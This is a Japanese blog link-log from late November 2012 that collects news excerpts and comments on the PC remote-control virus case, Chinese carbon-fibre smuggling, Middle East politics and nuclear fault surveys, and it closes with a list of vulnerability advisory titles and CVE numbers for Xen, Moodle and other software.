》 「偽工場」まで用意して“最先端”盗む 中国が狙う日本のハイテク (ITmedia, 11/26)
関係者によると、中国の軍事関係者が東レの最先端の炭素繊維を入手するよう大阪の商社に依頼。この商社に依頼された静岡県内のベンチャー企業が東レの子会社に「水素発生装置のボディーに使う」と虚偽説明を行い、平成21年にサンプル約1キロを確保し、経済産業省の許可を得ないまま中国に持ち出したとされる。(中略) 東レによると、このベンチャー企業は実際に炭素繊維を使用するとした工場を準備する周到さ。サンプルを渡した後に社員が行くと、跡形もなくなっていたという。田中副社長は「フェイクの工場は水素発生装置も準備され、よほど仕組まれていたようだ。これほど巧妙に偽装されると今後も危ないかもしれない」と打ち明ける。
関連:
輸出規制の炭素繊維、中国に不正持ち出しか 大阪の商社 軍事転用可 (産経, 10/24)
東レは社内調査などの結果、「詐欺行為の被害に遭ったことは把握しているが、商社が中国側に対し、低品位の炭素繊維を最先端のものと偽ったのではないか」(首脳)としている。大阪の商社は「特にコメントすることはありません」としている。
「ベンチャー企業」からはコメントをもらえなかったみたい。
》 大失敗スマートフォンKIN、流出ビデオが物語る欠陥 (クラウド Watch, 11/26)。そういえば、ありましたねえ。
》 JNSA、報告書「SNSの安全な歩き方」公表 (Internet Watch, 11/26)
》 ネット殺人予告:PC遠隔操作 警察庁、特別報奨金の適用検討 (毎日, 11/27)。keiki さん情報ありがとうございます。
警察庁によると、現行の要綱では同庁指定の指名手配犯に関する事件、または「社会的反響の大きい特異または重要」な事件が対象。後者は、さらに▽殺人や放火など生命・身体に重大な損害を及ぼした犯罪▽捜査本部の設置▽広告で情報提供を求めることが有効・適切と認められること−−の3要件を規定。報奨金は最高1000万円まで
遠隔操作事件はこの要件に入らないので改訂を検討、と。
》 PC遠隔操作事件、2ちゃんサーバー管理代行会社を捜索、威力業務妨害容疑で (Internet Watch, 11/27)
遠隔操作ウイルス事件で、インターネット掲示板「2ちゃんねる」に真犯人が直接書き込んだ形跡があるとして、警視庁など4都府県警の合同捜査本部は26日、威力業務妨害容疑で、同掲示板のサーバー管理を代行するコンピューター関連会社「ゼロ」(札幌市)を家宅捜索した。
ところがゼロ自身は家宅捜索を否定: 「家宅捜索の事実はない」、ゼロが2ちゃんねる遠隔操作ウイルス関連報道を否定 (日経 IT Pro, 11/27)
レンタルサーバー「BIG-server.com」の国内販売代理店であるゼロ(札幌市)は2012年11月26日、27日にいくつかの報道機関が報じた「威力業務妨害による2ちゃんねる管理会社ゼロの家宅捜索」というニュースについて、「事実無根である」との声明を発表した。「2ちゃんねる管理会社でも2ちゃんねる関連会社でもなく、また11月26日に家宅捜索を受けたという事実もない」(ゼロ)という。
》 なぜHPは88億ドルもの減損処理を行ったのか?——オートノミー不正会計問題 調査会社や監査法人などがオートノミーを擁護 (ComputerWorld.jp, 11/26)
》 SUNWAYMAN C15A 単三電池1本使用 LEDコンパクトライト (目指せ!ライトマニア HATTAのLEDライトレビュー, 11/26)
なお、付属のランヤードにはウィンドウ・インパクトが付いております。事故で車内にとじ込まれた時、車のガラスを破るのに使用できるようです。そんな状況はご免被りたいですけどね。
》 JPNIC、AS番号維持料を巡り訴えられる (Geek なぺーじ, 11/26)。by 浸透いうなの先生。 JPNICを訴えました (インターノット崩壊論者の独り言, 11/26)
本当は歴史的PIアドレスへの課金について争いたかったのですが、大学を原告にするのは困難でしたので、私の管理するAS番号で争うことにしたものです。全国の歴史的PIアドレス管理者の皆さんの多くも、その立場の弱さから忸怩たる思いで高額な課金を受け入れたと思います。あるいは歴史的なPIアドレスを返却あるは売却してしまった組織もあるようです。JPNIC に対しては「学生たちからグローバルIPアドレスを取り上げないでくれ」と訴えたのですがそうした声は無視されましたね。そうした思いを背に私一人ででもなんとか戦い抜きたいと思います。
訴状では論点を絞った方がよいと考え、規約変更の不当性を論点としています。しかし、本当に訴えたいのはその背景にある JPNIC の非民主的な運営です。今回の不当な課金についても、当初は当事者への説明会すら開催を否定されたりしました。その他ここでくどくどとは述べませんが、多くの方々(特に学術や地域ネットワークの方々)にはご理解頂けるものと思っています。
一方で「インターネット」の問題はインターネットのコミュニティで解決するのが筋だとおっしゃる方も多そうですが、そんな自律分散協調のインターネット幻想はすでに崩壊しているのです。「インターネットはインフラだ」などと言いつつ、幻想を語るのはおかしいでしょう。インフラだというのならなおさら法の下で民主的に活動を行って欲しいですね。市民から見えないところでISPの技術者たちだけで勝手なことしていないで、すべてのネットワーク利用者がステークホルダーとして参加し議論できる場を設けて欲しいものです。
12月3日(月)13:10から名古屋地裁で第1回口頭弁論が開かれる予定となっていますが、被告側から東京への移送の申立てが出ているとのことですのでどうなるかわかりません。とりあえず延期の可能性もあります。ここでも東京一極集中なんでしょうかね。
》 平成24年度総合セキュリティ対策会議(第1回議事要旨)について (警察庁, 11/19)
》 Weevを保釈するか? (エフセキュアブログ, 11/21)。 AT&TからiPadユーザー11万人の個人情報が漏洩した事件でハッカーに有罪判決、電子フロンティア財団からは憂慮の声 (gigazine, 11/21) の件。
つづき: WeevとWCITについてぜひ読んでほしい記事 (エフセキュアブログ, 11/29)
》 「2ちゃんねる」管理会社捜索=PC遠隔操作で書き込み−威力業務妨害容疑・警視庁 (時事, 11/26)
誤認逮捕された (中略) 男性らは2ちゃんねるで紹介されていた無料ソフトをパソコンに取り込んだ際、ソフトに仕込まれたウイルスに感染したとみられており、捜査本部はウイルス作成者が紹介を書き込んだとみて2ちゃんねる側に情報の開示を求めたが、拒否されていた。
捜査関係者によると、犯人は2ちゃんねるに投稿する際、他人に書き込みの代行を依頼する専用掲示板を利用して身元を隠していたが、捜査本部の調べで、犯人が一度だけこの掲示板を使わず、直接書き込みをした痕跡があったことが分かった。
関連: 2ちゃんねる関連会社捜索 PC操作事件、情報開示せず (弁護士 落合洋司 (東京弁護士会) の 「日々是好日」, 11/26)
》 Hacked Go Daddy sites infecting users with ransomware (Sophos, 11/23)。Go Daddy がホストするサイトの DNS 情報がハクられ、ニセサイトに誘導されたユーザにランサムウェアを感染させたみたい。
》 南相馬市での違和感と希望〜震災から1年半が経過した被災地病院での研修を通して (医療ガバナンス学会, 11/26)。2011.09.03〜29、南相馬市立総合病院での研修。
雲雀ヶ丘病院の精神科医師である堀有伸先生と共に、保健師に連れられて、仮設住宅に往診に行く機会をいただいた。しかし、ここでも私は驚くべき事態に遭遇した。
患者宅を訪問して声をかけても、ノックをしても、裏手に回って窓の方から呼びかけても、家の中からは返事どころか、まったく音沙汰もなかった。隣人に尋ねてみると、「隣の家の人は、何をやっているかわからない。夜中に音がするから、家の中にはいるんだろうねえ」という返答であった。壁一枚の間柄であったとしても、赤の他人だから深入りはしたくない。都会では珍しいことではないかもしれないが、この絶対的な危機的状況にある被災地においても、「隣人がどうなっていようが、関係ない」という、コミュニティの完全なる崩壊を感じた。
二軒目では、四畳半一間の空間に、下着姿の老婆が万年床の上で意識もうろうの状態で座っていた。髪の毛にはフケがわき、衣類も汚れ、もう何日もお風呂に入っていない様子であった。ふすま一枚を隔てた隣の部屋には30歳代くらいであろうか、息子が寝転んでテレビを見ていた。我々がおじゃましても、彼は無干渉で、何ごともなかったかのようにまたテレビを見続けていた。コミュニティの崩壊は隣人だけではなかった。家庭の中においても、それは同様であった。
特殊な家庭だったのかかもしれない。何か余程の事情があったのかもしれない。私には知る由もない、壮絶な現場がこの街には蔓延していた。糖尿病のコントロールができず、それに伴う"せん妄"という触れ込みで入院したことを、後で知った。
》 ケーリーちゃんが失踪した日、母親のパソコンに「絶対確実 窒息」の検索履歴があった (techcrunch, 11/26)
》 インターネットが女性を拘束する鎖になった: サウジ政府は妻の出国をSMSで夫に通知 (techcrunch, 11/24)
徴兵かシャビーハか?捕虜の運命 (ワールド&インテリジェンス, 11/13)。自由シリア軍戦車と捕虜。
極至近距離着弾の瞬間 (ワールド&インテリジェンス, 11/15)
市場で殺戮(死体多数注意) (ワールド&インテリジェンス, 11/18)
イスラエルVSハマス (ワールド&インテリジェンス, 11/21)
ところで、シリアの反体制派SNSでは、もちろんイスラエル非難の声も多いのですが、ここ数日、ハマス非難がものすごく増えています。ハマスのせいでイスラエルVSパレスチナに世界の注目が映ってしまったことに対して、ハマスはイランの口車に乗って余計なことをしたと思われているからです。真相はわかりませんが、結果的にシリア革命の大きな邪魔になったのは事実ですね。
シリアの義父の死 (ワールド&インテリジェンス, 11/21)
ダマスカスでもロケット弾攻撃 (ワールド&インテリジェンス, 11/21)
自由シリア軍の携帯式地対空ミサイル (ワールド&インテリジェンス, 11/23)。SA-7。
シリア勢力地図 (ワールド&インテリジェンス, 11/23)
焼け出された従姉妹一家 (ワールド&インテリジェンス, 11/26)
》 新種のコロナウイルス感染症について(更新3) (厚生労働省検疫所, 11/26)。まだよくわかってない。
》 価格下落が止まらない中国レアアース、中国企業が苦境に直面 (サーチナ / ニコニコニュース, 11/24)。自業自得。
貿易統計によれば中国から日本へのレアアース輸出量は前年比約7割減となり、レアアース平均価格はピーク時から約7割下落した。
中国のレアアース最大手「内蒙古包鋼レアアース高科技」はこのほど、傘下企業が10月下旬から実施しているレアアース生産の停止措置を1カ月間さらに延長すると発表するなど、深刻な影響が出始めている。
》 中東指導者死亡の怪 (中東の窓, 11/25)、元大統領の遺体掘り起こし=家族が毒殺説主張−トルコ (時事, 10/2)。トルコのトゥルグト・オザル元大統領 (1993 年死亡) に毒殺疑惑。
》 大統領令の余波(エジプト) (中東の窓, 11/26)。関連:
大統領権限強化の布告に法曹界が反発、スト呼びかけも エジプト (CNN, 11/25)
エジプト、大統領権限強化の憲法令めぐり抗議デモ (ロイター, 11/26)
エジプトの反政府勢力が大統領の権限強化に反発 (ウォール・ストリート・ジャーナル日本版, 11/26)
エジプト大統領の出身母体を襲撃 強権付与に反発 (日経, 11/26)。ムスリム同胞団事務所襲撃さる。
eBay closes critical security holes (H Security, 2012.11.25)。SQL Injection 穴、XSS 穴。
xen-announce Mail Thread Index。2012.11.13 付で Xen Security Advisory 20〜25 が出ている。
| XSA 20 | Xen 3.4〜4.2 | DoS | CVE-2012-4535 |
| XSA 21 | Xen 4.1 | DoS | CVE-2012-4536 |
| XSA 22 | Xen 3.4〜4.2 | DoS | CVE-2012-4537 |
| XSA 23 | Xen 4.0〜4.2 | DoS (hypervisor crash) | CVE-2012-4538 |
| XSA 24 | Xen 4.0〜4.2 | DoS | CVE-2012-4539 |
| XSA 25 | 全バージョン | DoS | CVE-2012-4544 CVE-2012-2625 |
いずれも patch が用意されている。
》 中国空母「遼寧(リャオニン)」の離着艦訓練が確認される (海国防衛ジャーナル, 11/25)。着実に前進しているようで。
》 核兵器を万能だと思い込んでいませんか? (海国防衛ジャーナル, 11/22)
》 利用者購入の医薬品データ収集 懸念の声 (NHK, 11/24)。医薬品購入で T ポイントの件。
厚生労働省の医療情報の取り扱いに関する検討会のメンバーで、新潟大学の鈴木正朝教授は、「医薬品の購入に関する情報は、刑法で秘密漏示罪の対象となる可能性があり、一般商品よりも厳格に保護する必要がある。規約の記載による説明だけでは不十分で、消費者がよく理解しないまま情報を提供することは、是正する必要がある」と話しています。
関連: 薬害オンブズパースン会議,Tポイントサービスに関する要望書提出 (弁護士谷直樹/法律事務所のブログ, 11/20)
》 アマゾンが業者として利用している「EC宅配」が酷いと話題に 家にいたのに持ち帰り・不在票入れない・再配達依頼しても来ない (はちま起稿, 11/24)。元サイトが読めなくなっているのではちま起稿をリンク。関連:
【amazon】EC宅配 不通2日目【遅配・電話不通】 (2ch.net)。特定の地域で被害が出ているようで。
アマゾンの配送業者が変わって遅配増大:さいたま市への影響 (yamato.tank.jp)。簡潔なまとめ。カトーレック、TMG、EC宅配、エコ配。
宅配便扱いの配達業者を変えたい人の出来ること
・コンビニ(ローソン及びファミリーマート店舗)受取を利用する。→詳細
・お急ぎ便・当日配達便(佐川・ヤマト運輸・日本郵便)で配送してもらう
・お届け日時指定便(ヤマト運輸)を利用する
・遅延についてアマゾンに文句を言う
》 前CIA長官が使った バレない不倫メールの仰天手口 (ゲンダイネット / livedoor, 11/22)。メールを送らない。
「米国当局によれば、ペトレアス長官とブロードウェル氏は2人だけのGメールのアカウントを開設して連絡を取っていた。メールは送信せず、下書きとして保存。それを互いに読みあっていたようです」(前出の米国事情通)
「え、それだけ?」と驚いてしまうが、“送信せず”というところがミソだ。
共有アカウント + 下書きのみで運用。
》 原発事故、現場の姿描く=東電社員ら実名証言−ノンフィクション作家が出版 (時事, 11/24)。「死の淵を見た男」 (PHP 研究所)
》 信金立てこもり:ニコニコ動画が中継継続 自粛要請遅れで (毎日, 11/24)。ひどいタイトルだな。
人質の安全確保を理由に県警記者クラブに自粛要請があったが、ニコニコ動画はクラブ非加盟のため伝わるのが遅れた。要請を知った後は生中継を一時中断した。インターネットメディアが登場するなどメディアが多様化する中で、捜査当局は新たな対応を迫られている。
記者クラブの弊害としか思えないんだが。
》 日本に恋してやまないウラジオストック 極東ロシアを豊かにするために不可欠な日露友好関係 (JBpress, 11/22)。「ロシアの泥沼」という言葉しか浮かばないんだが。
》 両陛下:沖縄で戦没者に祈り 白梅学徒隊の関係者と懇談 (毎日, 11/17)、 天皇、皇后両陛下が沖縄県入り 「白梅学徒隊」生存者らと懇談 (読売, 11/17)。青山さんがアンカーでやってた件。
那覇空港から糸満市の沖縄平和祈念堂に向かい、沖縄戦の野戦病院に看護要員として動員され、22人が犠牲になった「白梅学徒隊」の生存者ら3人と懇談。近くの国立沖縄戦没者墓苑も訪れ、約18万人の遺骨が納められた納骨堂の前に花を供えた。
白梅学徒隊の元隊員らでつくる白梅同窓会の中山きく会長(84)から、元学徒隊有志が戦争体験を伝える活動をしていると聞くと「大切なことですよね」と言葉を掛けた。中山さんらに白い菊の花を手渡した後、白梅学徒隊や教職員らの慰霊碑「白梅の塔」がどの方向にあるか質問。教えてもらった方角に向かい、2人そろって黙礼をした。
その後、中山さんは受け取った花を白梅の塔にささげ、亡くなった仲間に報告。「両陛下の気持ちを仲間に伝えられたと思う」と話した。
沖縄戦で動員された女子学徒隊は9つあり、両陛下は1993年に歴代天皇として初めて沖縄を訪れた際、「ひめゆり」「瑞泉」の2つの学徒隊の関係者に会っている。
宮内庁によると、両陛下は沖縄で組織的な戦闘が終結したとされる6月23日の「沖縄慰霊の日」には毎年、住まいの御所などで黙とうしている。
関連:
「アンカー」両陛下が元白梅学徒隊とご対面&白梅の塔ご訪問が実現しなかった理由 11/21放送 関西テレビ「アンカー」青山繁晴の“ニュースDEズバリ” (ぼやきくっくり, 11/22)。番組書き起こし。
何処か遠くへ 「白梅の塔」 (遠い目をしていた、あの日の空。)。2002.01 の訪問記。 周辺を含めて様子がよくわかる。
東電福島原発事故 総理大臣として考えたこと (幻冬舎新書)
原発難民 放射能雲の下で何が起きたのか (PHP 新書)
上のを読んでから下のを読むと、上のからごっそり抜け落ちているものが何なのかよくわかる。
》 北朝鮮がミサイル発射実験か? (ワールド&インテリジェンス, 11/23)
衛星打ち上げ 「今後も継続」=北朝鮮が国連で表明 (中央日報, 11/22)
北朝鮮は長距離ミサイル発射準備に着手=韓国当局 (中央日報, 11/23)
北朝鮮、ミサイル搬入か 北西部の発射場 (産経, 11/23)
北朝鮮の砲撃事件から2年 延坪島で追悼式=韓国 (中央日報, 11/23)
韓国国防部長官「北朝鮮、大統領選前後に挑発も」 (朝鮮日報, 11/22)。韓国大統領選は 12/19。
》 "もんじゅ 来年度中に再開可能" (NHK「かぶん」ブログ, 11/9)。ムラ人はまだまだヤル気マンマン。 それどころか、なんと実験炉「常陽」まで再稼働させようとしているという: なんと常陽が再稼働へ スケジュール提出 (ざまあみやがれい!, 11/22)
エジプト大統領が自身の権限強化、「国民の権利奪う」との非難も (ロイター, 11/23)
エジプト大統領が権限強化、独裁に懸念 野党は「ファラオだ」と批判 (AFPBB, 11/23)
ヤセル・アリ(Yasser Ali)大統領報道官はテレビ放送を通じて、「大統領は、革命を守るためにいかなる決定・措置も下すことができる」と述べ、また「大統領の決定や法令は絶対的なものであり、異議申し立てはできない」と発表。さらに、モルシ大統領の出身母体であるイスラム勢力が大半を占めているために、世俗派の野党から批判を浴びている憲法制定委員会についても、裁判所には解散命令を出す権限はないとしている。
この発表について野党は、「クーデター」と非難しており、また翌23日の抗議行動を全国的に呼びかけた。ノーベル平和賞受賞者で有力な野党指導者のモハメド・エルバラダイ(Mohamed ElBaradei)前国際原子力機関(IAEA)事務局長は、マイクロブログのツイッター(Twitter)への投稿で「モルシ氏は今日、全ての国家権力を侵害しエジプトの新たなファラオ(王)に名乗りを上げた。革命(の達成)に向けた大きな問題であり、悲惨な結果をもたらしかねない」と批判した。
大統領令の公布(エジプト) (中東の窓, 11/23)
目下エジプトではこの大統領令をめぐって賛成と反対派が鋭く対立しているようですが、それにしてもこのムルシーと言うのはガザの調停で米国の信頼を勝ち得て、今度はこれまで鋭く対立して来た司法界に対し正面から挑戦したもので、突然のことで背景等詳しいことは解りませんが、その大胆な手法とタイミングを見る政治的力量には正直驚かされています。
ムルシー手強しというのが取りあえずの印象です。
それにしても「動かない日本の政治」とは対照的ですね!
》 原発のない未来のために→あなたはどの政党を選択しますか。 (首都圏反原発連合)。わかりやすいまとめ。
》 【写真】政府の土地収用を拒否し続けていたら大変なことに=ネタ画像は政府を倒すリソースである—中国 (KINBRICKS NOW, 11/22)。うわ。トマソンなんていうレベルじゃねーーー。
》 時論公論 「オバマ政権2期目の課題」 (NHK 解説委員室, 11/7)、 時論公論 「緊張高まる米経済」 (NHK 解説委員室, 11/21)
》 時論公論 「"大学設置不認可"は何だったのか?」 (NHK 解説委員室, 11/8)
》 ピックアップ@アジア 「韓国大統領選まで1か月」 (NHK 解説委員室, 11/15)
》 時論公論 「ミャンマー 米大統領訪問の意味」 (NHK 解説委員室, 11/17)
新潟 ヨウ素剤を住民みずから配布 (NHK「かぶん」ブログ, 11/18)。新潟県長岡市。
ヨウ素剤配布"必要な状況にならない" (NHK「かぶん」ブログ, 11/21)。安全神話で GO。
自衛する権利を否定するのはよくない。
東通原発
東北電力・東通原発敷地でも断層調査へ (NHK「かぶん」ブログ, 11/20)
東通原発の断層調査 異論相次ぐ (NHK「かぶん」ブログ, 11/22)
東北電力は、東通原発で原子炉建屋の南側を中心に断層4本について地層を掘った溝の断面などを確認し、「断層は地下の水を吸って膨張し動いていて、活断層ではない」と説明しています。
これに対し、22日に開かれた現地調査の事前の会合では、専門家から「東北電力が説明する内容は似たようなケースがほかになく、矛盾が多い」「データが不足しているので、溝の断面のスケッチや年代が分かる資料が必要だ」といった意見が相次ぎました。
志賀原発
志賀原発の断層調査大幅遅れ (NHK「かぶん」ブログ, 10/25)。半年程度の遅れ。
原子炉建屋の地下に向けて、深さ40メートルのトンネルを垂直に掘る作業が遅れていることなどから、北陸電力は、今月末までとした中間報告が12月上旬に、来年1月末までとした最終報告が、最も遅い場合で来年6月末に、それぞれずれ込む見通しを明らかにしました。
敦賀原発
原発断層調査 2例目は敦賀原発 (NHK「かぶん」ブログ, 11/13)
敦賀原発で来月1日から断層調査 (NHK「かぶん」ブログ, 11/14)
大飯原発
大飯原発"関西電力の調査に疑問" (NHK「かぶん」ブログ, 11/14)。島崎邦彦委員。
大飯原発断層"方向性出せる" (NHK「かぶん」ブログ, 11/21)。島崎邦彦委員インタビュー。
大飯原発断層 5か所追加調査へ (NHK「かぶん」ブログ, 11/22)
関西電力は、追加調査の計画をまとめ、22日夕方、規制委員会に提出しました。
それによりますと、▽敷地の北側では、「活断層」か「地滑り」かで見解が分かれたズレなどについて、新たに4か所でまわりを掘削したり地下を円筒状に掘る「ボーリング調査」などを実施したりする、▽3号機の南側では断層の存在を確認するため、ボーリング調査を行うことにしています。
関西電力は、これらの調査を来年2月中旬までに終える計画ですが、国から指示された3号機の南側で断層を確認するトレンチ調査は、2月以降に始まる見通しです。
》 東電 テレビ会議映像を追加公開へ (NHK「かぶん」ブログ, 11/22)
新たに公開されるのは、去年3月16日からの1週間と、去年3月30日からの1週間の合わせて2週間分で、今月30日から今回も報道関係者に限って閲覧方式で公開されます。
》 逃亡中のJohn McAfee氏、ブログで真犯人発見者に2万5000ドルの報酬を出すと発表 (slashdot.jp, 11/22)
》 「グーグルアース」記載の島、行ってみたら存在しなかった (AFP=時事 / Yahoo, 11/22)。Sandy Island (サンディ島)。他の地図にもちゃんと出てるのだけど、ないものはない模様。 正体はひょうたん島か平成ガメラか、あるいは魔法使いのおねーちゃんが閉じ込められていて見えなくなっているだけなのか。
関連: Google地図で指摘された「幻の島」の正体が判明 (秋元@サイボウズラボ・プログラマー・ブログ, 11/28)
》 不正アプリは許されないが、事件化は難しい……警察庁サイバー課の人が語る (Internet Watch, 11/22)、 落合弁護士のコメント
私を、こういった講演に呼んでくれれば、できるだけわかりやすくお話するのですが、悲しいことに(?)、しがない弁護士では、来るのは真犯人(?)からのメールくらいで、そういった機会はなく、こうして細々とブログで書き留めておく次第です。
》 新gTLDに対する各国政府からの事前警告 (Geek なぺーじ, 11/23)。いろいろ物言いがついているようで。
》 フィンランドの警察が海賊行為をしなかった9歳の少女のラップトップを押収 (techcrunch, 11/23)。ひでえ。
ISPたちにフィンランドでThe Pirate Bayをブロックさせようとしている海賊対策グループCIAPCが、警察に通報した。警察は最初父親に、罰金600ユーロ(約770ドル)を払えば罪にしない、と告げた。(中略) 父親がその要請を断ったので、警察は火曜日の朝、彼の家にやってきた。どうやら彼の娘が、不正なダウンロードをしたらしい。そのとき彼女は、まずGoogleを見て、それからThe Pirate BayでポップスターChisuのニューアルバムを探した。父親によると、結局、目的のファイルは何も見つからなかったので、翌日二人はお店へ行き、アルバムを購入した。 (中略) しかも警官は退去するとき父親に、今度からはおとなしく600ユーロ払え、と言ったそうだ(まるで田舎のやくざの“用心棒代金”の請求だね)。
ケーサツは CIAPC の通報の正当性を全く確認していないと……。
》 Microsoft、Google Glassタイプのメガネ型デバイスの特許を申請 (techcrunch, 11/23)
》 マジコン輸入禁止へ、任天堂の申立が受理されたことを経産省が公式サイトで発表 (gigazine, 11/22)。税関で止められる。
また、当該物品の広告掲載やインターネット上での紹介、販売サイトへのリンクなどについても、個別取引のあっせんに該当する場合は、幇助行為として損害賠償や刑事罰の対象となる可能性がありますので、厳に慎んでいただきたい旨各方面に注意喚起してまいります。
》 信じられない! 冷戦下でGE社が、ソ連のウラン濃縮サービスを利用し、得たウランを日本に輸出していた (ざまあみやがれい!, 11/23)。「原発と原爆 「日・米・英」核武装の暗闘」の件。 今「シークレット・ウォーズ」を読んでいる最中で何度も顎が外れている私としては、「右手で殴りあいしながら左手で握手系の話って実はゴロゴロしてるんだなあ」と思った。
》 雑記帳:北秋田名物「バター餅」 全国デビュー (毎日, 11/23)。バター餅、そろそろケンミンショー効果も薄れたかなあと思ってぐぐってみると、いまだに
只今、ご注文殺到中のため、お届けまで3〜4ヵ月以上の時間を頂く場合がございます (choisurube.shop-pro.jp)
大変申し訳ございません。 只今ご注文が殺到しているため1〜2ヶ月まちとなっております (ani-akibayashi.com)
とか書かれてる。マジか……。現場まで行けば入手できるっぽいが、 自作した方が早そう。
切り餅で作る、簡単!バター餅 (allabout)
》 セキュリティフライデー、最大300ユーザーの負荷テストができるツールを3万円で発売 (日経 IT Pro, 11/22)。WebTaster-Z。
WebTaster-Zで可能な処理は、基本的にこれだけである。一般の負荷テストツールのような複雑な条件設定や細かい分析はできないが、だれでも簡単に使えて、導入しやすい価格にした。「ユーザーの話を聞くと、びっくりするくらい同時アクセスのテストをしていない。そんな人のために、単純に300人を集めてテストする環境を作りたかった」(佐内氏)。
WebTaster-Zの料金は、利用期間に合わせたライセンス価格になっている。2カ月の短期ライセンスは3万円、1年間のライセンスは15万円である。ライセンスが切れた後も、必要になったときに購入しチャージしてまた利用できる「ソフト電池」方式を採用している。5ユーザーまでのテスト環境は無償で利用できるので、「これで動作を確認してから購入してもらいたい」(佐内氏)という。
なぜ Z ……と思ったのだけど、もともと WebTaster という製品 (セキュリティテスト用) があるのですね。
WebTaster-Z の特長解説が興味深い。
欠陥探し型のテスト/レポートではなく、プラス思考で利用できます。
犯人捜し、責任回避など、ありがちな不幸な状況をあまり作りません。
「あまり」に誠実さを見た。エンジニアはこうありたい。
》 スクープした記者が明かす 恐怖の「胆管がん多発事件」はなぜ起こったか【前編】 (現代ビジネス, 11/15)、 【後編】 (現代ビジネス, 11/22)
》 「日銀の国債直接引受け」批判に安倍氏「言っていない」 (日本報道検証機構, 11/23)
日銀の会見録によれば、朝日や毎日が引用した白川氏の発言は、「一般論で結構ですが、国債を日銀が直接引き受ける、買い入れることについて、総裁としてはどうお考えでしょうか」との質問に対し、「今、記者の方がおっしゃった通り、あくまでも一般論として申し上げます」と断った上でなされたものでした。この点、朝日や毎日の記事は、白川氏が安倍氏の主張に直接反論したかのような誤解を与える可能性があります(なお、NHK、共同、読売、日経は、一般論と断った上での発言として伝えていました)。
■日銀総裁記者会見要旨(2012年11月20日)(6頁参照)
また、安倍氏は、20日夜、フェイスブック上で「日銀の買い切りオペによる日銀の買い取りを行う」と述べたとし「直接買い取りとは言っていない」と釈明していました(21日午後の会見でも同様に説明)。しかし、朝日や毎日の記事は、「日銀による建設国債の直接引き受け」が安倍氏の主張であるかのような誤解を与えた可能性があります(なお、毎日は同日朝刊の別の記事で、安倍氏の「直接買い取りではない」との反論を紹介していますが、朝日は紹介していませんでした)。
同様に、日経の21日付社説も、安倍氏の発言を「大きな問題」と批判した上で「日銀が政府から国債を直接引き受けることを、財政法は禁じている」と指摘していました。この社説も「直接引き受け」が安倍氏の主張であるかのような誤解を与えた可能性があります。
関連: 「建設国債の日銀引き受け」発言は本当にあったのか?安倍自民党総裁vs白川日銀総裁の「金融政策論争」はメディアが仕組んだけんかだ (現代ビジネス, 11/23)。誤報の詳細な解説。
自民党の安倍晋三総裁が2〜3%のインフレ目標設定と大胆な金融緩和を日銀に求めた件で、白川方明日銀総裁が反論した。多くのメディアは「安倍が日銀による建設国債の直接引き受けを求めた」という話を前提に、白川の反論を報じている。だが、そもそも安倍の要求なるもの自体がほとんど誤報である。
メディアが安倍の話を曲解して報じたあげく、白川に反論させた構図である。言ってみれば、メディアが勝手にでっち上げた空中楼閣のような「論争」なのだ。
それで得したのは誰かと言えば、日銀と民主党である。なぜなら「日銀の国債引き受けはとんでもない」という認識が広まったうえ、前原誠司経済財政相兼国家戦略相らの安倍批判がもっともらしく聞こえてしまうからだ。
こういう展開を目の当たりにすると、つくづく世の中を悪くしている原因の1つはメディアであると思う。自分たちのいい加減な報道を棚に上げるだけでなく、デフレを脱却できない主犯である日銀に免罪符を与えている。それどころか、あたかも日銀の言い分が正しいかのように国民を誤解させているのだ。
国民の代理人(すなわち国会議員)を目指す立場の人間が「日銀にどんな政策をとってほしいか」を語ってもおかしくない。「その政策はダメだ」と多数の国民が判断すれば、選挙で落選するだけの話である。
それにひきかえ、踏み込み過ぎたのは前原である。前原は最近、経済財政相という経済政策を担当する閣僚の立場でありながら「日銀は外債購入すべきだ」と繰り返し表明した。政策手段を日銀に委ねる独立性尊重の観点からは、経済の重要閣僚が具体的な手段に言及するのは慎重であるべきだ。前原は安倍発言を「政治介入だ」と批判した。しかしそれは本来、前原がかみしめる言葉ではないか。
もう1点。日銀の国債引き受けは財政法で禁じられているから絶対にダメなのか。そんなことはない。実際には毎年、国会の決議の下で日銀が国債を引き受けている。この点は本コラムの同僚執筆者でもある高橋洋一がすでに、あちこちで指摘しているので、そちらに任せよう。
ReVuln claims 0day vulnerabilities for SCADA systems (H Security, 2012.11.22)
JVNVU#273371: Novell File Reporter に複数の脆弱性 (JVN, 2012.11.19)。この件: New 0day Exploits: Novell File Reporter Vulnerabilities (rapid7, 2012.11.16)
JVNVU#849841: Autonomy Keyview IDOL ライブラリに複数の脆弱性 (JVN, 2012.11.21)。Autonomy Keyview IDOL を利用している各社の製品に影響がある。 Autonomy Keyview IDOL 10.16 で修正されている。
VU#849841: Autonomy Keyview IDOL contains multiple vulnerabilities in file parsers (US-CERT, 2012.11.20)。対象 Vendor いっぱい。
SYM12-018: 複数のベンダーが影響を受ける HP Autonomy KeyView Filter の問題に関する更新 (シマンテック, 2012.11.20)。シマンテック製品では更新版で修正されているようで。
Abusing Windows Remote Management (WinRM) with Metasploit (rapid7, 2012.11.08)
JVNVU#558132: Dell OpenManage Server Administrator にクロスサイトスクリプティングの脆弱性 (JVN, 2012.11.15)。更新版があるようです。
Security Announcements (Moodle)。2012.11.19 付で MSA-12-0057 〜 0063 が出ています。 ただし 0060 は YUI2 の件。
JVNDB-2012-005479: Moodle の Dropbox Repository File Picker における異なるユーザの Dropbox にアクセスされる脆弱性 (JVN, 2012.11.22)。MSA-12-0057
JVNDB-2012-005480: Moodle の lib/formslib.php におけるアクセス制限を回避される脆弱性 (JVN, 2012.11.22)。MSA-12-0058
JVNDB-2012-005481: Moodle における異なるグループユーザの活動エントリを読まれる脆弱性 (JVN, 2012.11.22)。MSA-12-0059
MSA-12-0060: Cross-site scripting vulnerability in YUI2 (moodle, 2012.11.19)
JVNDB-2012-005482: Moodle の Portfolio プラグインにおけるファイルをアップロードされる脆弱性 (JVN, 2012.11.22)。MSA-12-0061
JVNDB-2012-005483: Moodle における他の参加者のエントリの閲覧制限を回避される脆弱性 (JVN, 2012.11.22)。MSA-12-0062
JVNDB-2012-005484: Moodle における全てのケイパビリティデータを読まれる脆弱性 (JVN, 2012.11.22)。MSA-12-0063
関連: Moodle 2.3.3, 2.2.6 and 2.1.9 are now available (moodle, 2012.11.12)
JVNDB-2012-005443: radsecproxy におけるアクセス制限を回避される脆弱性 (JVN, 2012.11.21)。radsecproxy 1.6.2 (2012.10.25) で修正されている。 CVE-2012-4566
